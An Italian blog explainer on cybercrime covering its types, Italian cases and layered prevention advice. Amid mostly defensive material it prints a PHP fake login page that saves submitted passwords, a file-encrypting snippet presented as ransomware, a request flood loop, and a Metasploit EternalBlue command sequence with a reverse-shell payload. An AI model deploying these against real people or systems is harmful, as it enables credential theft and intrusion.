Loading...

Approfondimento Tech

Cybercrime: minacce, tipi ed esempi

Scopri cos’è il cybercrime, i tipi più comuni, esempi reali e come 

Tipi di minacce

Indice dei contenuti

  • Cybercrime cos’è? Significato e definizione tecnica
  • Cybercrime: quali sono i tipi più comuni ed esempi reali da conoscere
  • Come prevenire il cybercrime: soluzioni e strategie
  • La difesa è multilivello
  • Checklist per la sicurezza personale e aziendale

Il cybercrime è una delle minacce più pervasive del nostro tempo. Con l’aumento della dipendenza da tecnologie informatiche, anche la criminalità informatica si è evoluta, colpendo privati, aziende, ospedali e governi.

Questo articolo esplora cos’è il cybercrime, quali sono i tipi di cybercrime più diffusi, con esempi concreti recenti, e come attuare una solida prevenzione cybercrime a livello personale e aziendale.

Cybercrime cos’è? Significato e definizione tecnica

Cybercrime: il significato. Per Cybercrime si intende qualsiasi attività illecita che coinvolge un sistema informatico, una rete o un dispositivo connesso a Internet come mezzo, bersaglio o ambiente del reato.

La definizione tecnica lo classifica come “un reato informatico commesso per mezzo di dispositivi elettronici, con l’obiettivo di danneggiare, estorcere, manipolare o rubare dati o risorse digitali”.

Il crimine informatico si distingue dai reati comuni per la sua natura digitale e transnazionale.

I criminali non hanno bisogno di essere fisicamente presenti per compiere un attacco: possono operare da qualsiasi parte del mondo, colpendo infrastrutture critiche, utenti inconsapevoli o persino intelligenze artificiali mal configurate.

1. Crimini contro la persona

Questi reati informatici mirano a danneggiare direttamente gli individui, agendo sulla loro identità, reputazione o integrità psicologica.

Furto d’identità online

Questo crimine informatico si basa spesso sul phishing, che può avvenire via email, SMS (smishing) o telefonate (vishing). Un classico esempio di script PHP per simulare un login fittizio di phishing (da usare solo per scopi didattici o simulazioni di red teaming):

<?php

// FALSO FORM DI LOGIN - SOLO PER TESTING IN AMBIENTI CHIUSI

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    $file = fopen("credenziali.txt", "a+");

    fwrite($file, "Email: " . $_POST['email'] . " | Password: " . $_POST['password'] . "\n");

    fclose($file);

    header("Location: https://example.com/login?error"); // redirect post phishing

    exit();

}

?>

<form method="post">

  Email: <input type="text" name="email">

  Password: <input type="password" name="password">

  <input type="submit" value="Accedi">

</form>

Esempio reale (Italia, 2022)
Un attacco di phishing ai danni di utenti INPS ha portato al furto delle credenziali SPID per accedere a bonus e documenti sensibili.

Sextortion

Tecnica in cui la vittima riceve email minatorie che dichiarano di possedere immagini intime registrate tramite malware o accesso alla webcam. Viene chiesto un pagamento in Bitcoin.

Esempio reale
Subject: Abbiamo hackerato il tuo computer (Prova: password123)
Il tuo schermo è stato registrato mentre visitavi contenuti per adulti.
Paga 500€ in BTC a questo indirizzo…

Difesa: Copertura webcam, antivirus aggiornato, controllo dei processi (es. lsof -i su Linux per capire se la webcam è in uso).

Cyberstalking

Viene attuato tramite la sorveglianza continua della presenza online, messaggi intimidatori, doxing e tracciamento degli spostamenti via GPS (in caso di stalking tramite app installate).

Tool usati dai criminali:

  • Stalkerware (es. mSpy, FlexiSPY)
  • Accesso non autorizzato ai profili social

2. Crimini contro i dati

Questi attacchi puntano alla violazione di dati sensibili, siano essi personali o aziendali. Spesso causano gravi danni reputazionali e perdite economiche.

Ransomware

Un ransomware cripta i dati e chiede un riscatto. Solitamente sfrutta allegati Word o PDF con macro o vulnerabilità RCE.

Esempio di codice Python base (educational only):

from cryptography.fernet import Fernet

# Chiave simmetrica per cifrare i dati

key = Fernet.generate_key()

cipher = Fernet(key)

# Cifrare un file

with open('documenti_sensibili.txt', 'rb') as f:

    data = f.read()

enc_data = cipher.encrypt(data)

with open('documenti_sensibili.txt', 'wb') as f:

    f.write(enc_data)

Esempio reale
Nel 2023, il gruppo LockBit ha attaccato l’Agenzia delle Entrate italiana, chiedendo milioni di euro e minacciando la pubblicazione di milioni di documenti fiscali.

Data Breach

Violazione massiva di database. Spesso deriva da configurazioni errate di MongoDB, Elasticsearch o bucket S3 senza autenticazione.

Esempio reale
La piattaforma italiana HoMobile ha subito nel 2021 un furto massivo di SIM e dati anagrafici dei clienti (nome, numero, ICCID).

Esempio di comando di scan per porte MongoDB aperte:

nmap -p 27017 --script mongodb-info <target>

Spyware

Software che raccoglie dati come cronologia browser, cookie, file di log, credenziali salvate. Può essere installato da un allegato o tramite exploit kit.

  • Tecniche di detection
    Monitoraggio dei processi in background (ps aux), uso di strumenti EDR e controllo su file di log sospetti.

3. Crimini contro i sistemi

Sono mirati a compromettere l’integrità, disponibilità e funzionamento dei sistemi IT: dal server web alla supply chain OT.

Attacchi DDoS

Un attacco Distributed Denial of Service consiste nell’inviare un volume enorme di richieste a un server, saturando le sue risorse.

Codice base in Python (test in locale):

import requests

for i in range(10000):

    try:

        requests.get('http://127.0.0.1:8000')

    except:

        pass

Tool professionali: LOIC, HOIC, Slowloris

Esempio reale
Nel 2022, il sito del Ministero della Difesa italiano è stato reso irraggiungibile per 48 ore da attacchi DDoS rivendicati dal gruppo pro-Russia KillNet.

Intrusioni nei sistemi

Accesso abusivo a un sistema informatico sfruttando vulnerabilità note (CVE) o password deboli.

Esempio di exploit (simulato):

msfconsole

use exploit/windows/smb/ms17_010_eternalblue

set RHOST <target IP>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit

Difesa: aggiornamenti software, segmentazione, password robuste, MFA.

Defacement

Modifica illecita delle pagine web di un’organizzazione con messaggi politici, insulti o simboli.

Esempio reale
Nel 2020, il sito di una scuola pubblica italiana è stato defacciato con una bandiera ISIS e frasi minatorie. Il server aveva WordPress con un plugin non aggiornato da 3 anni.

Comando per identificare CMS vulnerabili:

whatweb --log-verbose=log.txt http://targetsite.com

Cybercrime: quali sono i tipi più comuni ed esempi reali da conoscere

Esempi di Cybercrime nella realtà.

Caso 1: Attacco ransomware a un ospedale italiano (2024)

Un gruppo di criminali informatici ha compromesso i sistemi IT di un ospedale pubblico italiano, criptando cartelle cliniche e bloccando le prenotazioni. È stato chiesto un riscatto di 1 milione di euro in Bitcoin. I servizi sanitari sono rimasti paralizzati per giorni, con gravi conseguenze per i pazienti oncologici.

Caso 2: Phishing su larga scala via PEC

Nel 2023, migliaia di imprese italiane sono state raggiunte da PEC false dell’Agenzia delle Entrate. I messaggi contenevano allegati infetti che, se aperti, installavano malware per sottrarre informazioni riservate e propri dati aziendali.

Caso 3: Frode informatica con social engineering

Nel 2022, una multinazionale è stata truffata con una frode informatica ben architettata: un finto CEO ha ordinato via email il trasferimento di 2 milioni di euro a un conto estero, sfruttando tecniche di ingegneria sociale e spoofing dell’indirizzo.

Come prevenire il cybercrime: soluzioni e strategie

La prevenzione cybercrime non può più essere affidata al caso o all’improvvisazione. In un contesto dove i reati informatici aumentano in complessità e frequenza, è fondamentale mettere in campo strategie multilivello, che combinino strumenti tecnologici, formazione e policy.

Ecco una panoramica completa delle soluzioni per prevenire il cybercrime, accompagnata da esempi pratici.

1. Autenticazione a due o più fattori (2FA/MFA)

Uno dei modi più efficaci per proteggere dati sensibili e account è implementare 2FA (Two-Factor Authentication) o MFA (Multi-Factor Authentication).

Esempio pratico
Google Authenticator, Microsoft Authenticator, Duo Security o OTP via SMS/email sono strumenti che obbligano l’utente a confermare la propria identità anche se la password è compromessa.

Esempio di implementazione 2FA in Laravel PHP:

use PragmaRX\Google2FALaravel\Support\Authenticator;

public function login(Request $request)

{

    $user = User::where('email', $request->email)->first();

    if ($user && Hash::check($request->password, $user->password)) {

        $authenticator = app(Authenticator::class)->boot($request);

        if ($authenticator->isAuthenticated()) {

            Auth::login($user);

            return redirect()->intended('dashboard');

        }

    }

    return redirect()->back()->withErrors(['Autenticazione fallita']);

}

2. Software di sicurezza aggiornati

Un sistema privo di aggiornamenti è il bersaglio perfetto per un attacco informatico. I cybercriminali sfruttano vulnerabilità note (CVE) per ottenere accesso ai sistemi.

Best practice:

  • Patch Management automatico (es. WSUS, APT, yum)
  • Antivirus e EDR (Endpoint Detection & Response) come BitDefender, CrowdStrike, SentinelOne
  • Firewall software e hardware (pfSense, Cisco, Fortinet)

Comando utile su Linux:

sudo apt update && sudo apt upgrade -y

3. Backup regolari e sicuri

Un backup non è utile se è:

  • sullo stesso sistema compromesso
  • non testato
  • non crittografato

Strategie di backup efficaci:

  • Modello 3-2-1: 3 copie, 2 su supporti diversi, 1 off-site
  • Backup automatici giornalieri su NAS isolati
  • Crittografia con GPG o AES256

Esempio di script bash:

#!/bin/bash

tar czf /mnt/backup/backup-$(date +%F).tar.gz /var/www/html

gpg -c /mnt/backup/backup-$(date +%F).tar.gz

rm /mnt/backup/backup-$(date +%F).tar.gz

4. Segmentazione e controllo degli accessi

Un attacco riuscito non deve compromettere l’intero sistema. La segmentazione di rete e il principio del least privilege (minimo privilegio) sono fondamentali.

Esempi di controllo:

  • Separare la rete IT da quella OT in ambito industriale
  • Usare VLAN e subnet dedicate
  • Limitare l’accesso a file e cartelle via ACL

Esempio con iptables:

iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

iptables -A INPUT -p tcp --dport 22 -j DROP

5. Sistemi SIEM e rilevamento delle minacce

I SIEM (Security Information and Event Management) raccolgono log da fonti diverse per identificare anomalie e tentativi di intrusione.

Soluzioni open source e commerciali:

  • Wazuh, Graylog, ELK Stack
  • Splunk, IBM QRadar, Microsoft Sentinel

Query di esempio con Elasticsearch per rilevare tentativi di login falliti:

{

  "query": {

    "bool": {

      "must": [

        { "match": { "event.type": "authentication_failure" } },

        { "range": { "@timestamp": { "gte": "now-1h" } } }

      ]

    }

  }

}

6. Formazione e cultura della sicurezza

Anche la miglior tecnologia non serve a nulla se l’utente clicca su un link malevolo. Ogni organizzazione deve educare i propri dipendenti al riconoscimento delle minacce informatiche.

Tecniche consigliate:

  • Simulazioni di phishing (es. con GoPhish)
  • Brevi sessioni formative mensili
  • Newsletter interne con aggiornamenti sulle frode informatiche

7. Policy aziendali e governance della sicurezza

Ogni azienda deve essere dotata di una politica di sicurezza informatica scritta e condivisa. Gli standard da seguire includono:

  • ISO/IEC 27001
  • NIST Cyber Security Framework
  • GDPR per la protezione dei dati personali

Esempio di policy minima da adottare:

  • Tutti i dispositivi aziendali devono avere password complesse
  • È vietato usare USB non cifrati
  • Backup eseguiti ogni 24h e conservati per 30 giorni
  • Aggiornamenti software entro 48h dal rilascio patch

8. Monitoraggio continuo e threat intelligence

Essere informati in tempo reale sulle nuove minacce informatiche è cruciale.

Risorse consigliate:

  • CERT-AgID (per la pubblica amministrazione italiana)
  • AlienVault OTX, VirusTotal, AbuseIPDB
  • Feed open source come MISP o TheHive

9. Sicurezza mobile e BYOD

Nel modello Bring Your Own Device è fondamentale proteggere smartphone e tablet:

  • Mobile Device Management (MDM) per controllare l’accesso remoto
  • Impostare PIN e biometria obbligatori
  • Limitare l’uso di app non autorizzate

10. Hardening dei sistemi e dei servizi

Il sistema operativo deve essere reso più sicuro eliminando i servizi inutili, impostando logica di permessi corretta e monitorando file critici.

Tool utili:

  • Lynis: scanner di sicurezza per Linux
  • Auditd: monitoraggio file sensibili
  • Fail2ban: blocco IP dopo troppi tentativi falliti

La difesa è multilivello

La prevenzione cybercrime efficace richiede un approccio stratificato che va dal software alla formazione, dai backup alla governance. Non basta un singolo strumento per fermare la criminalità informatica: è l’integrazione di tecnologie, comportamenti e processi a fare la differenza.

Nel prossimo paragrafo ti forniremo una checklist scaricabile per applicare subito queste strategie, sia in azienda che in contesto domestico. Intanto, se hai dubbi o vuoi raccontare come proteggi i tuoi sistemi, lascia un commento nel form in basso.

Checklist per la sicurezza personale e aziendale

Ecco una checklist che può essere adattata sia a privati sia a piccole e medie imprese:

  • Aggiorna regolarmente i tuoi sistemi operativi e software
  • Attiva l’autenticazione a due fattori su tutti i tuoi account
  • Utilizza password uniche e complesse (usa un password manager)
  • Installa e configura un buon antivirus e firewall
  • Non cliccare mai su link sospetti o allegati non attesi
  • Crittografa i file contenenti dati sensibili
  • Esegui backup automatici su supporti offline
  • Segnala ogni tentativo di truffa alle autorità competenti
  • Educa i tuoi collaboratori e familiari alle minacce informatiche
  • Verifica regolarmente i log di accesso ai tuoi sistemi

Un modello scaricabile in formato PDF è consigliabile per una prevenzione cybercrime sistematica e strutturata.

Per concludere

La criminalità informatica rappresenta oggi uno dei principali pericoli del mondo digitale. Che si tratti di un singolo utente o di una grande azienda, nessuno è immune.

Tuttavia, conoscere cos’è il cybercrime, i tipi di cybercrime esistenti e i casi reali più noti può aiutare ad adottare misure efficaci di sicurezza informatica. La prevenzione cybercrime non è una scelta opzionale, ma una responsabilità condivisa.


Domande e risposte

  1. Cos’è il cybercrime?
    È un reato informatico che coinvolge l’uso illecito di tecnologie digitali per scopi criminali.
  2. Quali sono i tipi più comuni di cybercrime?
    Furto d’identità, ransomware, phishing, attacchi DDoS, frodi online.
  3. Cosa si intende per crimine informatico?
    Un reato commesso usando computer, reti o dispositivi connessi per rubare dati o causare danni.
  4. Come si riconosce un attacco informatico?
    Email sospette, rallentamenti di sistema, accessi non autorizzati o perdita di file sono segnali comuni.
  5. Cosa fare se si è vittime di un cybercrime?
    Segnalarlo alla Polizia Postale, scollegare i dispositivi compromessi, contattare esperti di sicurezza.
  6. Che differenza c’è tra cybercrime e cyberwarfare?
    Il cybercrime ha scopi economici, mentre il cyberwarfare è usato da Stati per sabotaggio o spionaggio.
  7. Il backup protegge dal ransomware?
    Sì, se i backup sono offline o su cloud sicuri e crittografati.
  8. Quali sono gli strumenti per prevenire un attacco informatico?
    Antivirus, firewall, autenticazione a due fattori, aggiornamenti e formazione.
  9. Come si può proteggere un sito web da attacchi?
    Usando WAF, backup, aggiornamenti costanti e controllo degli accessi.
  10. L’intelligenza artificiale può aiutare contro il cybercrime?
    Sì, tramite sistemi di rilevamento delle minacce basati su machine learning.
To top